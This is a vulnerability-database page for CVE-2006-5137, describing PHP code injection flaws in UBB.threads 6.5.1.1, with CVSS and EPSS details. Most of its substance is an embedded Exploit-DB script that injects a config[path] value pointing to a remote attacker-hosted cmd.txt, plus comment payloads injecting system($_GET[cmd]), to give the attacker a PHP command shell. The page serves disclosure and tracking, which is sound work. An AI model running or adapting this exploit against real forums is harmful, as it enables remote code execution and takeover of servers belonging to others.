CVE-2006-5137 : Detail

CVE-2006-5137

2.62%V4
Network
2006-10-02
18h00 +00:00
2018-10-17
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple direct static code injection vulnerabilities in Groupee UBB.threads 6.5.1.1 allow remote attackers to (1) inject PHP code via a theme[] array parameter to admin/doedittheme.php, which is injected into includes/theme.inc.php; (2) inject PHP code via a config[] array parameter to admin/doeditconfig.php, and then execute the code via includes/config.inc.php; and inject a reference to PHP code via a URL in the config[path] parameter, and then execute the code via (3) dorateuser.php, (4) calendar.php, and unspecified other scripts.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2457

Publication date : 2006-09-28 22h00 +00:00
Author : HACKERS PAL
EDB Verified : Yes

#!/usr/bin/php -q -d short_open_tag=on <? // UBB.threads Multiple input validation error // Discovered By : HACKERS PAL // Copy rights : HACKERS PAL // Website : http://www.soqor.net // Email Address : security@soqor.net // Tested on Version 6 (6.5.1.1) and other versions maybe affected // Remote File including : // ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir // ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir // ------------------------------------------------------- // Files overwrite vulnerabilities // if magic_qoutes_gpc = off // admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../ // and open includes/theme.inc.php?cmd=ls -la // or :- // admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../ // and open includes/config.inc.php?cmd=ls -la // -- # -- # -- # -- // if magic_qoutes_gpc = on // admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt? // and you will have a command execution files .. // example // dorateuser.php?cmd=ls -la // calendar.php?cmd=ls -la // and so many other files which includes using this variable ($config[path]) // ------------------------------------------------------- // Full path // cron/php/subscriptions.php // ------------------------------------------------------- // Exploit :- /* /* UBB.threads Multiple vulnerabilities /* This exploit should allow you to execute commands /* By : HACKERS PAL /* WwW.SoQoR.NeT */ print_r(' /**********************************************/ /* UBB.threads Command Execution */ /* by HACKERS PAL <security@soqor.net> */ /* site: http://www.soqor.net */'); if ($argc<2) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host /* Example: */ /* php '.$argv[0].' http://localhost/ /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); $url=$argv[1]."/"; $exploit="admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt?"; $page=$url.$exploit; Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } $page = get_page($page); $newpage = get_page($url."calendar.php"); if(eregi("Cannot execute a blank command",$newpage)) { Die("\n[+] Exploit Finished\n[+] Go To : ".$url."calendar.php?cmd=ls -la\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } Else { Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } ?> # milw0rm.com [2006-09-29]

Products Mentioned

Configuraton 0

Ubbcentral>>Ubb.threads >> Version 6.5.1.1

References

http://securityreason.com/securityalert/1676
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/20266
Tags : vdb-entry, x_refsource_BID